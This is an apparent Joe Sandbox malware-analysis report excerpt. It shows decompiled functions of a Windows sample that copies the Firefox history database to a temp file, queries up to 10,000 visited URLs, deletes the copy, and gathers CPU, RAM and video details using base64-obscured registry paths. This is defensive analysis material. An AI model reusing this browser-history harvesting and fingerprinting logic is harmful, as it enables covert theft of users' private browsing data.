				intOrPtr* _t138;
				void* _t140;
				intOrPtr* _t142;
				void* _t144;
				intOrPtr* _t152;
				intOrPtr* _t158;
				intOrPtr* _t164;
				void* _t166;
				void* _t178;
				intOrPtr _t198;
				intOrPtr _t200;
				intOrPtr _t213;
				intOrPtr _t217;
				intOrPtr _t218;
				void* _t219;
				void* _t220;

				_t215 = __esi;
				_t177 = __ebx;
				_t217 = _t218;
				_t178 = 0xb;
				do {
					_push(0);
					_push(0);
					_t178 = _t178 - 1;
					_t223 = _t178;
				} while (_t178 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				_push(_t217);
				_push(0x412839);
				_push( *[fs:eax]);
				 *[fs:eax] = _t218;
				E00403B80( &_v28);
				_push(_t217);
				_push(0x4127af);
				_push( *[fs:eax]);
				 *[fs:eax] = _t218;
				E00406FDC(GetTickCount(), __ebx,  &_v60, __esi, _t223);
				_push(_v60);
				E00406F1C( &_v64, __ebx, __edi, __esi, _t223);
				_push(_v64);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t177,  &_v40, _t223);
				E004062D8(L"%TEMP%",  &_v72, _t223);
				_push(_v72);
				_push(0x412870);
				_push(_v32);
				E00403E1C();
				E0040781C(_v68, _t177,  &_v44, _t223);
				_t86 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t86, 0xffffffff);
				E0040377C( &_v76, _v44);
				E00404AFC(_v76, _t177, _t178,  &_v36, _t215, _t223);
				E00403D2C( &_v80, _v36);
				if(E004076B0(_v80, _t177, _t178) != 0) {
					_t101 =  *0x41b55c; // 0x41c784
					_t103 =  *((intOrPtr*)( *_t101))(E00403990(_v36),  &_v16);
					_t219 = _t218 + 8;
					__eflags = _t103;
					if(_t103 == 0) {
						_t138 =  *0x41b5cc; // 0x41c78c
						_t140 =  *((intOrPtr*)( *_t138))(_v16, "SELECT DATETIME(moz_historyvisits.visit_date/1000000, \"unixepoch\", \"localtime\"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000", 0xffffffff,  &_v20,  &_v24);
						_t220 = _t219 + 0x14;
						__eflags = _t140;
						if(_t140 == 0) {
							while(1) {
								_t142 =  *0x41b600; // 0x41c790
								_t144 =  *((intOrPtr*)( *_t142))(_v20);
								__eflags = _t144 - 0x64;
								if(_t144 != 0x64) {
									goto L9;
								}
								E004034E4( &_v48);
								E004034E4( &_v52);
								E004034E4( &_v56);
								_t152 =  *0x41b588; // 0x41c794
								E004036DC( &_v48,  *((intOrPtr*)( *_t152))(_v20, 0));
								_t158 =  *0x41b588; // 0x41c794
								E004036DC( &_v52,  *((intOrPtr*)( *_t158))(_v20, 1));
								_t164 =  *0x41b588; // 0x41c794
								_t166 =  *((intOrPtr*)( *_t164))(_v20, 2);
								_t220 = _t220 + 0x18;
								E004036DC( &_v56, _t166);
								_push(_v28);
								_push(0x412978);
								E00403D2C( &_v84, _v48);
								_push(_v84);
								_push(0x412980);
								E00403D2C( &_v88, _v52);
								_push(_v88);
								_push(0x41298c);
								E00403D2C( &_v92, _v56);
								_push(_v92);
								_push(L"\r\n\r\n");
								E00403E1C();
							}
						}
					}
					L9:
					_t105 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t105))(_v20);
					_t109 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t109))(_v16);
					_pop(_t198);
					 *[fs:eax] = _t198;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t213);
					 *[fs:eax] = _t213;
				}
				_pop(_t200);
				 *[fs:eax] = _t200;
				_push(E00412840);
				E00403B98( &_v92, 4);
				E004034E4( &_v76);
				E00403B98( &_v72, 4);
				E00403508( &_v56, 3);
				E00403B98( &_v44, 2);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}














































                                                                      0x0041256c
                                                                      0x0041256c
                                                                      0x0041256d
                                                                      0x0041256f
                                                                      0x00412574
                                                                      0x00412574
                                                                      0x00412576
                                                                      0x00412578
                                                                      0x00412578
                                                                      0x00412578
                                                                      0x0041257b
                                                                      0x0041257c
                                                                      0x0041257d
                                                                      0x0041257e
                                                                      0x00412581
                                                                      0x00412587
                                                                      0x0041258e
                                                                      0x0041258f
                                                                      0x00412594
                                                                      0x00412597
                                                                      0x0041259d
                                                                      0x004125a4
                                                                      0x004125a5
                                                                      0x004125aa
                                                                      0x004125ad
                                                                      0x004125b8
                                                                      0x004125bd
                                                                      0x004125c3
                                                                      0x004125c8
                                                                      0x004125cb
                                                                      0x004125d8
                                                                      0x004125e3
                                                                      0x004125f0
                                                                      0x004125f5
                                                                      0x004125f8
                                                                      0x004125fd
                                                                      0x00412608
                                                                      0x00412613
                                                                      0x0041261d
                                                                      0x0041262c
                                                                      0x00412637
                                                                      0x00412642
                                                                      0x0041264d
                                                                      0x0041265c
                                                                      0x00412678
                                                                      0x0041267f
                                                                      0x00412681
                                                                      0x00412684
                                                                      0x00412686
                                                                      0x0041269f
                                                                      0x004126a6
                                                                      0x004126a8
                                                                      0x004126ab
                                                                      0x004126ad
                                                                      0x00412772
                                                                      0x00412776
                                                                      0x0041277d
                                                                      0x00412780
                                                                      0x00412783
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004126bb
                                                                      0x004126c3
                                                                      0x004126cb
                                                                      0x004126d6
                                                                      0x004126e7
                                                                      0x004126f2
                                                                      0x00412703
                                                                      0x0041270e
                                                                      0x00412715
                                                                      0x00412717
                                                                      0x0041271f
                                                                      0x00412724
                                                                      0x00412727
                                                                      0x00412732
                                                                      0x00412737
                                                                      0x0041273a
                                                                      0x00412745
                                                                      0x0041274a
                                                                      0x0041274d
                                                                      0x00412758
                                                                      0x0041275d
                                                                      0x00412760
                                                                      0x0041276d
                                                                      0x0041276d
                                                                      0x00412772
                                                                      0x004126ad
                                                                      0x00412789
                                                                      0x0041278d
                                                                      0x00412794
                                                                      0x0041279b
                                                                      0x004127a2
                                                                      0x004127a7
                                                                      0x004127aa
                                                                      0x004127bf
                                                                      0x004127cd
                                                                      0x0041265e
                                                                      0x00412660
                                                                      0x00412663
                                                                      0x00412663
                                                                      0x004127d4
                                                                      0x004127d7
                                                                      0x004127da
                                                                      0x004127e7
                                                                      0x004127ef
                                                                      0x004127fc
                                                                      0x00412809
                                                                      0x00412816
                                                                      0x0041281e
                                                                      0x0041282b
                                                                      0x00412838

                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 004125B0
                                                                      • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412870,?,.tmp,?,?,00000000,004127AF,?,00000000,00412839,?,00000000), ref: 0041262C
                                                                      • DeleteFileW.KERNEL32(00000000), ref: 004127CD
                                                                      Strings
                                                                      • .tmp, xrefs: 004125CB
                                                                      • SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000, xrefs: 00412696
                                                                      • , xrefs: 00412760
                                                                      • %TEMP%, xrefs: 004125EB
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$CopyCountDeleteTick
                                                                      • String ID: $%TEMP%$.tmp$SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000
                                                                      • API String ID: 2381671008-462058183
                                                                      • Opcode ID: 416e3653b17ffb8b792b409557a66c85679e4b3f6acb14a3ced176a5403dbca9
                                                                      • Instruction ID: 880bf71673710542150f6ebe4433b3a02274b147136189202950d85bd83b2515
                                                                      • Opcode Fuzzy Hash: 416e3653b17ffb8b792b409557a66c85679e4b3f6acb14a3ced176a5403dbca9
                                                                      • Instruction Fuzzy Hash: A9810C71A00109AFDB00EF95DD82ADEBBB9EF48314F504536F410F72A2DB78AE558B58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00416744 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 114COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 46%
                                                                      			E00416744(signed int __eax, void* __ebx, void* __esi) {
				struct _SYSTEM_INFO _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				signed int _t38;
				signed int _t91;
				void* _t92;
				void* _t93;
				intOrPtr _t112;
				void* _t116;
				intOrPtr _t119;
				intOrPtr _t120;

				_t117 = __esi;
				_t38 = __eax | 0x5500000a;
				_t119 = _t120;
				_t92 = 0xb;
				do {
					_push(0);
					_push(0);
					_t92 = _t92 - 1;
					_t122 = _t92;
				} while (_t92 != 0);
				_t91 = _t38;
				_push(_t119);
				_push(0x4168d4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t120;
				GetSystemInfo( &_v40);
				E00403D2C( &_v48,  *_t91);
				_push(_v48);
				_push(L"CPU Model: ");
				_push(0);
				_push( &_v52);
				E00406984("UHJvY2Vzc29yTmFtZVN0cmluZw==", _t91,  &_v60, _t116, __esi);
				E00403D2C( &_v56, _v60);
				_push(_v56);
				E00406984("SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==", _t91,  &_v68, _t116, __esi);
				E00403D2C( &_v64, _v68);
				_pop(_t93);
				E00407500(0x80000002, _t91, _t93, _v64);
				_push(_v52);
				_push(0x416974);
				E00403E1C();
				E0040377C(_t91, _v44);
				E004037DC( &_v80, "CPU Count: ",  *_t91);
				E00403D2C( &_v76, _v80);
				_push(_v76);
				E00406FDC(_v40.dwNumberOfProcessors, _t91,  &_v84, _t117, _t122);
				_push(_v84);
				_push(0x416974);
				E00403E1C();
				E0040377C(_t91, _v72);
				_push( *_t91);
				_push("GetRAM: ");
				E00416584( &_v88, _t91, _t117, _t122);
				_push(_v88);
				_push(0x4169ac);
				E00403850();
				_push( *_t91);
				_push("Video Info\r\n");
				E00416644( &_v92, _t91, _t116, _t117);
				_push(_v92);
				E00403850();
				_t112 = 0x4169ac;
				 *[fs:eax] = _t112;
				_push(E004168DB);
				E00403508( &_v92, 2);
				E00403B80( &_v84);
				E004034E4( &_v80);
				E00403B98( &_v76, 2);
				E004034E4( &_v68);
				E00403B80( &_v64);
				E004034E4( &_v60);
				return E00403B98( &_v56, 4);
			}

























                                                                      0x00416744
                                                                      0x00416744
                                                                      0x00416749
                                                                      0x0041674b
                                                                      0x00416750
                                                                      0x00416750
                                                                      0x00416752
                                                                      0x00416754
                                                                      0x00416754
                                                                      0x00416754
                                                                      0x00416758
                                                                      0x0041675c
                                                                      0x0041675d
                                                                      0x00416762
                                                                      0x00416765
                                                                      0x0041676c
                                                                      0x00416776
                                                                      0x0041677b
                                                                      0x0041677e
                                                                      0x00416783
                                                                      0x00416788
                                                                      0x00416791
                                                                      0x0041679c
                                                                      0x004167a4
                                                                      0x004167ad
                                                                      0x004167b8
                                                                      0x004167c5
                                                                      0x004167c6
                                                                      0x004167cb
                                                                      0x004167ce
                                                                      0x004167db
                                                                      0x004167e5
                                                                      0x004167f4
                                                                      0x004167ff
                                                                      0x00416804
                                                                      0x0041680d
                                                                      0x00416812
                                                                      0x00416815
                                                                      0x00416822
                                                                      0x0041682c
                                                                      0x00416831
                                                                      0x00416833
                                                                      0x0041683b
                                                                      0x00416840
                                                                      0x00416843
                                                                      0x0041684f
                                                                      0x00416854
                                                                      0x00416856
                                                                      0x0041685e
                                                                      0x00416863
                                                                      0x00416872
                                                                      0x00416879
                                                                      0x0041687c
                                                                      0x0041687f
                                                                      0x0041688c
                                                                      0x00416894
                                                                      0x0041689c
                                                                      0x004168a9
                                                                      0x004168b1
                                                                      0x004168b9
                                                                      0x004168c1
                                                                      0x004168d3

                                                                      APIs
                                                                      • GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                        • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                        • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeString$InfoSystem
                                                                      • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                                                                      • API String ID: 4070941872-1038824218
                                                                      • Opcode ID: ea7c467229dc03554361d8e6d8d9c9cd62cd80fa8131b6840d5b8a065aae733e
                                                                      • Instruction ID: 93658ecaa3e0ddcdd5b33a88495a7f5ee5c1cb8a97fdfd99440d65a07410f67b
                                                                      • Opcode Fuzzy Hash: ea7c467229dc03554361d8e6d8d9c9cd62cd80fa8131b6840d5b8a065aae733e
                                                                      • Instruction Fuzzy Hash: DF411F70A1010DABDB01FFD1D882ACDBBB9EF48309F61403BF504B7296D639EA458A58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00416748 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 114COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 46%
                                                                      			E00416748(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				struct _SYSTEM_INFO _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr* _t90;
				void* _t91;
				void* _t92;
				intOrPtr _t111;
				intOrPtr _t118;
				intOrPtr _t119;

				_t116 = __esi;
				_t115 = __edi;
				_t118 = _t119;
				_t91 = 0xb;
				do {
					_push(0);
					_push(0);
					_t91 = _t91 - 1;
					_t120 = _t91;
				} while (_t91 != 0);
				_t90 = __eax;
				_push(_t118);
				_push(0x4168d4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119;
				GetSystemInfo( &_v40);
				E00403D2C( &_v48,  *_t90);
				_push(_v48);
				_push(L"CPU Model: ");
				_push(0);
				_push( &_v52);
				E00406984("UHJvY2Vzc29yTmFtZVN0cmluZw==", _t90,  &_v60, __edi, __esi);
				E00403D2C( &_v56, _v60);
				_push(_v56);
				E00406984("SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==", _t90,  &_v68, __edi, __esi);
				E00403D2C( &_v64, _v68);
				_pop(_t92);
				E00407500(0x80000002, _t90, _t92, _v64);
				_push(_v52);
				_push(0x416974);
				E00403E1C();
				E0040377C(_t90, _v44);
				E004037DC( &_v80, "CPU Count: ",  *_t90);
				E00403D2C( &_v76, _v80);
				_push(_v76);
				E00406FDC(_v40.dwNumberOfProcessors, _t90,  &_v84, _t116, _t120);
				_push(_v84);
				_push(0x416974);
				E00403E1C();
				E0040377C(_t90, _v72);
				_push( *_t90);
				_push("GetRAM: ");
				E00416584( &_v88, _t90, _t116, _t120);
				_push(_v88);
				_push(0x4169ac);
				E00403850();
				_push( *_t90);
				_push("Video Info\r\n");
				E00416644( &_v92, _t90, _t115, _t116);
				_push(_v92);
				E00403850();
				_t111 = 0x4169ac;
				 *[fs:eax] = _t111;
				_push(E004168DB);
				E00403508( &_v92, 2);
				E00403B80( &_v84);
				E004034E4( &_v80);
				E00403B98( &_v76, 2);
				E004034E4( &_v68);
				E00403B80( &_v64);
				E004034E4( &_v60);
				return E00403B98( &_v56, 4);
			}























                                                                      0x00416748
                                                                      0x00416748
                                                                      0x00416749
                                                                      0x0041674b
                                                                      0x00416750
                                                                      0x00416750
                                                                      0x00416752
                                                                      0x00416754
                                                                      0x00416754
                                                                      0x00416754
                                                                      0x00416758
                                                                      0x0041675c
                                                                      0x0041675d
                                                                      0x00416762
                                                                      0x00416765
                                                                      0x0041676c
                                                                      0x00416776
                                                                      0x0041677b
                                                                      0x0041677e
                                                                      0x00416783
                                                                      0x00416788
                                                                      0x00416791
                                                                      0x0041679c
                                                                      0x004167a4
                                                                      0x004167ad
                                                                      0x004167b8
                                                                      0x004167c5
                                                                      0x004167c6
                                                                      0x004167cb
                                                                      0x004167ce
                                                                      0x004167db
                                                                      0x004167e5
                                                                      0x004167f4
                                                                      0x004167ff
                                                                      0x00416804
                                                                      0x0041680d
                                                                      0x00416812
                                                                      0x00416815
                                                                      0x00416822
                                                                      0x0041682c
                                                                      0x00416831
                                                                      0x00416833
                                                                      0x0041683b
                                                                      0x00416840
                                                                      0x00416843
                                                                      0x0041684f
                                                                      0x00416854
                                                                      0x00416856
                                                                      0x0041685e
                                                                      0x00416863
                                                                      0x00416872
                                                                      0x00416879
                                                                      0x0041687c
                                                                      0x0041687f
                                                                      0x0041688c
                                                                      0x00416894
                                                                      0x0041689c
                                                                      0x004168a9
                                                                      0x004168b1
                                                                      0x004168b9
                                                                      0x004168c1
                                                                      0x004168d3

                                                                      APIs
                                                                      • GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                        • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                        • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeString$InfoSystem
                                                                      • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                                                                      • API String ID: 4070941872-1038824218
                                                                      • Opcode ID: c93147df2423285c54bad4dc95c4c660ec513e1a04b46fc35375619ea2add05a
                                                                      • Instruction ID: 0500c902736339f4efa0b07d3f9bc907855da1606bbc95f65d7857d0c3659172
                                                                      • Opcode Fuzzy Hash: c93147df2423285c54bad4dc95c4c660ec513e1a04b46fc35375619ea2add05a
                                                                      • Instruction Fuzzy Hash: 27410F70A1010DABDB01FFD1D882EDDBBB9EF48709F61403BF504B7296D639EA458A58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00403368 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 79%
                                                                      			E00403368(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x41c034 == 0) {
					if( *0x41b024 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x41c208 == 0xd7b2 &&  *0x41c210 > 0) {
						 *0x41c220();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E004033F0, 2,  &_v4, 0);
				}
			}





                                                                      0x00403370
                                                                      0x004033d0
                                                                      0x004033e0
                                                                      0x004033e0
                                                                      0x004033e6
                                                                      0x00403372
                                                                      0x0040337b
                                                                      0x0040338b
                                                                      0x0040338b
                                                                      0x004033a7
                                                                      0x004033c8
                                                                      0x004033c8

                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000), ref: 004033A1
                                                                      • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E), ref: 004033A7
                                                                      • GetStdHandle.KERNEL32(000000F5,004033F0,00000002,0041A69E,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436), ref: 004033BC
                                                                      • WriteFile.KERNEL32(00000000,000000F5,004033F0,00000002,0041A69E,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436), ref: 004033C2
                                                                      • MessageBoxA.USER32 ref: 004033E0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileHandleWrite$Message
                                                                      • String ID: Error$Runtime error at 00000000
                                                                      • API String ID: 1570097196-2970929446
                                                                      • Opcode ID: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
                                                                      • Instruction ID: 272384808b0d926620c8a29f01af81f970e1c010559b5e4fcbf7d036ebb79ccd
                                                                      • Opcode Fuzzy Hash: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
                                                                      • Instruction Fuzzy Hash: F5F09670AC03847AE620A7915DCAF9B2A5C8708F15F20867BB660744E5DBBC55C4525D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00402668 Relevance: 11.4, APIs: 9, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00402668(CHAR* __eax, intOrPtr* __edx) {
				char _t5;
				char _t6;
				CHAR* _t7;
				char _t9;
				CHAR* _t11;
				char _t14;
				CHAR* _t15;
				char _t17;
				CHAR* _t19;
				CHAR* _t22;
				CHAR* _t23;
				CHAR* _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;
				void* _t36;

				_t34 = __edx;
				_t22 = __eax;
				while(1) {
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L4:
					if( *_t22 != 0x22 || _t22[1] != 0x22) {
						_t36 = 0;
						_t32 = _t22;
						while(1) {
							_t6 =  *_t22;
							if(_t6 <= 0x20) {
								break;
							}
							if(_t6 != 0x22) {
								_t7 = CharNextA(_t22);
								_t36 = _t36 + _t7 - _t22;
								_t22 = _t7;
								continue;
							}
							_t22 = CharNextA(_t22);
							while(1) {
								_t9 =  *_t22;
								if(_t9 == 0 || _t9 == 0x22) {
									break;
								}
								_t11 = CharNextA(_t22);
								_t36 = _t36 + _t11 - _t22;
								_t22 = _t11;
							}
							if( *_t22 != 0) {
								_t22 = CharNextA(_t22);
							}
						}
						E00403AC0(_t34, _t36);
						_t23 = _t32;
						_t33 =  *_t34;
						_t35 = 0;
						while(1) {
							_t14 =  *_t23;
							if(_t14 <= 0x20) {
								break;
							}
							if(_t14 != 0x22) {
								_t15 = CharNextA(_t23);
								if(_t15 <= _t23) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t15 > _t23);
								continue;
							}
							_t23 = CharNextA(_t23);
							while(1) {
								_t17 =  *_t23;
								if(_t17 == 0 || _t17 == 0x22) {
									break;
								}
								_t19 = CharNextA(_t23);
								if(_t19 <= _t23) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t19 > _t23);
							}
							if( *_t23 != 0) {
								_t23 = CharNextA(_t23);
							}
						}
						return _t23;
					} else {
						_t22 =  &(_t22[2]);
						continue;
					}
				}
			}



















                                                                      0x0040266c
                                                                      0x0040266e
                                                                      0x0040267a
                                                                      0x0040267a
                                                                      0x0040267a
                                                                      0x0040267e
                                                                      0x00402678
                                                                      0x00402678
                                                                      0x0040267a
                                                                      0x0040267a
                                                                      0x0040267e
                                                                      0x00402678
                                                                      0x00402678
                                                                      0x00402684
                                                                      0x00402687
                                                                      0x00402694
                                                                      0x00402696
                                                                      0x004026dd
                                                                      0x004026dd
                                                                      0x004026e1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040269c
                                                                      0x004026d0
                                                                      0x004026d9
                                                                      0x004026db
                                                                      0x00000000
                                                                      0x004026db
                                                                      0x004026a4
                                                                      0x004026b6
                                                                      0x004026b6
                                                                      0x004026ba
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004026a9
                                                                      0x004026b2
                                                                      0x004026b4
                                                                      0x004026b4
                                                                      0x004026c3
                                                                      0x004026cb
                                                                      0x004026cb
                                                                      0x004026c3
                                                                      0x004026e7
                                                                      0x004026ec
                                                                      0x004026ee
                                                                      0x004026f0
                                                                      0x00402745
                                                                      0x00402745
                                                                      0x00402749
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004026f6
                                                                      0x00402731
                                                                      0x00402738
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040273a
                                                                      0x0040273a
                                                                      0x0040273c
                                                                      0x0040273f
                                                                      0x00402740
                                                                      0x00402741
                                                                      0x00000000
                                                                      0x0040273a
                                                                      0x004026fe
                                                                      0x00402717
                                                                      0x00402717
                                                                      0x0040271b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402703
                                                                      0x0040270a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040270c
                                                                      0x0040270c
                                                                      0x0040270e
                                                                      0x00402711
                                                                      0x00402712
                                                                      0x00402713
                                                                      0x0040270c
                                                                      0x00402724
                                                                      0x0040272c
                                                                      0x0040272c
                                                                      0x00402724
                                                                      0x00402751
                                                                      0x0040268f
                                                                      0x0040268f
                                                                      0x00000000
                                                                      0x0040268f
                                                                      0x00402687

                                                                      APIs
                                                                      • CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 0040269F
                                                                      • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026A9
                                                                      • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026C6
                                                                      • CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026D0
                                                                      • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026F9
                                                                      • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402703
                                                                      • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402727
                                                                      • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402731
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CharNext
                                                                      • String ID:
                                                                      • API String ID: 3213498283-0
                                                                      • Opcode ID: b7f289542d20783a7460a3fa223e5cf14214bb8296ee11ce479d6e83d044995d
                                                                      • Instruction ID: 5b28f76bfa796ab2381ca360e83c3cb8d2614de50686c14b6561fe7fc9f0b368
                                                                      • Opcode Fuzzy Hash: b7f289542d20783a7460a3fa223e5cf14214bb8296ee11ce479d6e83d044995d
                                                                      • Instruction Fuzzy Hash: B021E7546043951ADB31297A0AC877B6B894A5B304B68087BD0C1BB3D7D4FE4C8B832D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00410E70 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 239fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 45%
                                                                      			E00410E70(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
